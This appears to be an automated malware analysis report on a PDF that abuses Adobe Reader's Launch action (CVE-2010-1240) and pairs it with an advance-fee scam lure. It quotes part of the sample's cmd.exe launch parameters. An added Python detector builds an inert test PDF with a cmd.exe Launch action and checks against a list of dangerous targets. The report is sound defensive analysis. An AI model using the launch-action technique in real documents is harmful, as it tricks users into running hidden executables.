Malicious PDF — malware analysis report

Static analysis result for SHA-256 e7787c196f8ee035…

Verdict: MALICIOUS
File type: PDF
Size: 259.0 KB
Created: 2010-05-27 22:13:33 -04:00
Authoring application: Writer (via OpenOffice.org 3.0)
MD5: 32b55ab7204f2c8eac0b6789b83e3b2a
SHA-1: 72d545ef8128ad7e71a930328f1c45348142f792
SHA-256: e7787c196f8ee035ffca9c14739fb2c5114624aaeabe3ad331579191a94ecb43
Risk score: 406

Malware Insights

MITRE ATT&CK
  • T1204.002 User Execution: Malicious File
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1105 Ingress Tool Transfer

The PDF contains a /Launch action (PDF_LAUNCH, scored critical) that invokes cmd.exe with parameters crafted to run a Windows executable carried inside one of the document's own streams. This is the Adobe Reader/Acrobat Launch-action abuse tracked as CVE-2010-1240: Reader still shows its launch warning dialog, but the attacker controls part of the text in it, so execution depends on the user clicking through (T1204.002). The document body uses advance-fee scam wording (SE_ADVANCE_FEE_SCAM_LURE), so the lure and the dropper travel in the same file. The embedded executable together with the launch action strongly suggests the document's purpose is to execute that payload and bring in a second stage (T1105).

Heuristics (12)

  • Adobe Reader Launch action command execution [critical] CVE_2010_1240 (exact CVE match: CVE-2010-1240)
    PDF uses the Adobe Reader/Acrobat Launch action pattern associated with CVE-2010-1240: cmd.exe is invoked with attacker-controlled parameters, paired with an embedded/exported payload.
  • Launch action [critical] PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application.
  • Embedded Windows executable payload in PDF stream [critical] PDF_EMBEDDED_PE_PAYLOAD
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • /Launch action target: cmd.exe [critical] PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\handbook.pdf" (cd "Desktop"' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • ClamAV: Pdf.Tool.Agent-1388586 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Tool.Agent-1388586
  • Clickable PDF combines external action with parser-evasion structure [high] PDF_ACTION_PARSER_EVASION
    PDF has an external clickable URI together with object graph or xref structures that make parsers disagree, such as divergent duplicate objects, parser divergence, or xref offset mismatch. That combination is stronger than a plain link: the document is both an outward-action carrier and a parser-confusion/evasion sample.
  • Advance-fee lottery/parcel scam lure [high] SE_ADVANCE_FEE_SCAM_LURE
    Document contains lottery/beneficiary or prize language together with large-value draft/funds wording and parcel/courier delivery requirements. This is a classic advance-fee fraud document shape.
  • JavaScript action [low] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file [low] PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
  • External URI [info] PDF_URI
    PDF contains an external URL action.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs extracted:
      • http://www.suntrust.com/retirementsolutions
      • http://www.discoverybenefits.com/
      • http://www.cignabehavioral.com/
      • http://www.cign.com/
      • http://www.teldrug.com/
      • http://www.mycigna.com/
      • http://www.lifebenefits.com/
      • http://www.netbenefits.fidelity.com/
      • http://www.unum.com/
      • http://www.eyemedvisioncare.com/
      • http://www.kaiserpermanente.org/
      • http://www.cigna.com/
      • http://www.CIGNA.com/
      • http://www.cigna.com/healthyrewards
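The heuristics above describe detection logic without showing it. The Python below is an added illustration (editorial example code, not the analysis engine's rules and not code from the sample) that implements three of them against a constructed, inert PDF built inside the script: PDF_LAUNCH_COMMAND (pull the /F target and /P parameters out of a /Launch action and score known-dangerous targets), PDF_EMBEDDED_PE_PAYLOAD (inflate FlateDecode streams and verify an MZ header whose e_lfanew lands on "PE\0\0", rather than grepping for "MZ"), and the xref-offset-mismatch half of PDF_ACTION_PARSER_EVASION (compare each classic xref entry with where the object really starts). The dangerous-target list, the regex-based object discovery and the 20-byte xref entry layout are assumptions of this example, and the constructed sample's payload is a bare PE header with no code behind it.

```python
import re
import struct
import zlib

# Rules mirrored from the report's heuristics; target list and 20-byte xref layout are assumptions.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
LAUNCH_RE = re.compile(rb"/S\s*/Launch\b")
DANGEROUS_TARGETS = (b"cmd", b"powershell", b"wscript", b"cscript", b"mshta", b"rundll32")


def find_objects(pdf: bytes) -> dict:
    """Map object number -> (offset of 'N G obj', body up to endobj)."""
    objs = {}
    for m in OBJ_RE.finditer(pdf):
        end = pdf.find(b"endobj", m.end())
        objs[int(m.group(1))] = (m.start(), pdf[m.end():end if end != -1 else len(pdf)])
    return objs


def decode_stream(body: bytes):
    """Stream payload of an object (inflated when /FlateDecode), or None if it has no stream."""
    m = STREAM_RE.search(body)
    if m is None:
        return None
    raw = m.group(1)
    if b"/FlateDecode" not in body:
        return raw
    try:
        return zlib.decompress(raw)
    except zlib.error:
        return raw  # corrupt filter data: still scan the raw bytes


def is_pe(data: bytes) -> bool:
    """PDF_EMBEDDED_PE_PAYLOAD: 'MZ' magic and an e_lfanew that lands on 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def launch_finding(body: bytes):
    """PDF_LAUNCH / PDF_LAUNCH_COMMAND: target (/F) and parameters (/P) of a /Launch action."""
    if not LAUNCH_RE.search(body):
        return None
    f = re.search(rb"/F\s*\((.*?)\)", body)
    p = re.search(rb"/P\s*\((.*?)\)", body)
    target = f.group(1) if f else b""
    severity = "critical" if any(d in target.lower() for d in DANGEROUS_TARGETS) else "high"
    return {"target": target.decode(errors="replace"), "severity": severity,
            "params": (p.group(1) if p else b"").decode(errors="replace")}


def xref_mismatches(pdf: bytes, objs: dict) -> list:
    """Parser-evasion check: xref entries whose offset is not where 'N 0 obj' really begins."""
    sx = re.search(rb"startxref\s+(\d+)", pdf[pdf.rfind(b"startxref"):])
    hdr = sx and re.match(rb"xref\s+(\d+)\s+(\d+)\s*", pdf[int(sx.group(1)):])
    if not hdr:
        return []  # xref stream or damaged table: not handled by this example
    first, count = int(hdr.group(1)), int(hdr.group(2))
    pos, bad = int(sx.group(1)) + hdr.end(), []
    for i in range(count):  # each classic entry is exactly "oooooooooo ggggg n \n"
        entry = pdf[pos + 20 * i:pos + 20 * i + 20]
        num, claimed = first + i, int(entry[:10])
        if entry[17:18] == b"n" and num in objs and objs[num][0] != claimed:
            bad.append((num, claimed, objs[num][0]))
    return bad


def scan(pdf: bytes) -> dict:
    """Run the three checks over every object and collect (object number, finding) tuples."""
    objs = find_objects(pdf)
    report = {"launch": [], "embedded_pe": [], "xref_mismatch": xref_mismatches(pdf, objs)}
    for num, (off, body) in objs.items():
        hit = launch_finding(body)
        if hit:
            report["launch"].append((num, hit))
        data = decode_stream(body)
        if data is not None and is_pe(data):
            report["embedded_pe"].append((num, off, len(data)))
    return report


def build_sample_pdf(lie_in_xref: bool = False) -> bytes:
    """Constructed, inert PDF: a cmd.exe /Launch action plus a FlateDecoded stream that
    starts with a fake PE header and no code. It is not the analysed sample."""
    fake_pe = bytearray(b"MZ" + b"\x00" * 0x3A) + struct.pack("<I", 0x80)  # e_lfanew -> 0x80
    fake_pe += b"\x00" * (0x80 - len(fake_pe)) + b"PE\x00\x00" + b"\x00" * 64
    packed = zlib.compress(bytes(fake_pe))
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R >>",
        b"<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/Q /C %HOMEDRIVE%&cd %HOMEPATH%&dir) >> >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed) + packed + b"\nendstream",
    ]
    out, offsets = bytearray(b"%PDF-1.4\n"), []
    for i, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % i + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for i, off in enumerate(offsets):  # lie_in_xref mis-points object 4's entry by 7 bytes
        out += b"%010d 00000 n \n" % (off + 7 if lie_in_xref and i == 3 else off)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_pos)
    return bytes(out)
```

The regex-based object walk is deliberate: a tolerant scanner finds objects by their `N G obj` headers regardless of what the xref table claims, so the mismatches it reports are exactly the places where a lenient reader and a strict reader will disagree about the document, which is the divergence PDF_ACTION_PARSER_EVASION scores. On a real file, `scan(open(path, "rb").read())` is the entry point; the PE check intentionally returns false for a stream that merely contains the two bytes "MZ".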

Extracted artifacts (9)

Files carved from inside the sample during analysis.

javascript_obj0274_000.js
  SHA-256: ff55c3569615905a49995e011f58a5f14b9bcd78f90366bfed8a0a3717ddaa0c
  Kind:    pdf-javascript-stream
  Source:  PDF /JS object 274 at offset 0x4078B
  Size:    57 bytes

stream_043_off0003e52f.bin
  SHA-256: 1c1634873ea9549570bb1f7663f87cafc871ff6854aa491bd150c94a58742453
  Kind:    decompressed-pdf-stream
  Source:  PDF FlateDecoded stream at offset 0x3E52F
  Size:    29696 bytes

font_00_sfnt_off0001acc6.bin
  SHA-256: 1595e16a4f9a0296195e8dc1865868585c10d52861edb7be5bd8d7bb46db92b6
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x1ACC6
  Size:    33568 bytes

font_01_sfnt_off0001f5e7.bin
  SHA-256: 34b0487b9d5db5448761716fd39edac50b029d9a55416c4f3c80a2767672c1b9
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x1F5E7
  Size:    27004 bytes

font_02_sfnt_off0002290d.bin
  SHA-256: daebbe6f5b3bb39df11cac5456a4dd34995b98a47d83eea0b3f52e995dd61225
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x2290D
  Size:    31960 bytes

font_03_sfnt_off00026c0c.bin
  SHA-256: 84c02ed1e82014a67a7bc68df43de9ea2cab3e3cffaf559b8eb8f98dc2c1ba23
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x26C0C
  Size:    25516 bytes

font_04_sfnt_off00029adf.bin
  SHA-256: 4027f6d872dc004d25fac9306111c00201f60500e4898dfe0941d608ccc2a3e6
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x29ADF
  Size:    16476 bytes

font_05_sfnt_off0002ba18.bin
  SHA-256: 5d3b487106b60ccd273e9fbbc201f0d7bba5eba88fc208da91f96864df8478f7
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x2BA18
  Size:    46720 bytes

font_06_sfnt_off00033197.bin
  SHA-256: 3a6f2930bb6cbd05763fa470b4e32e0c20dcc3efa4d1c4d37d1e60fd340f4b67
  Kind:    pdf-font-stream
  Source:  PDF embedded font (sfnt) at offset 0x33197
  Size:    21924 bytes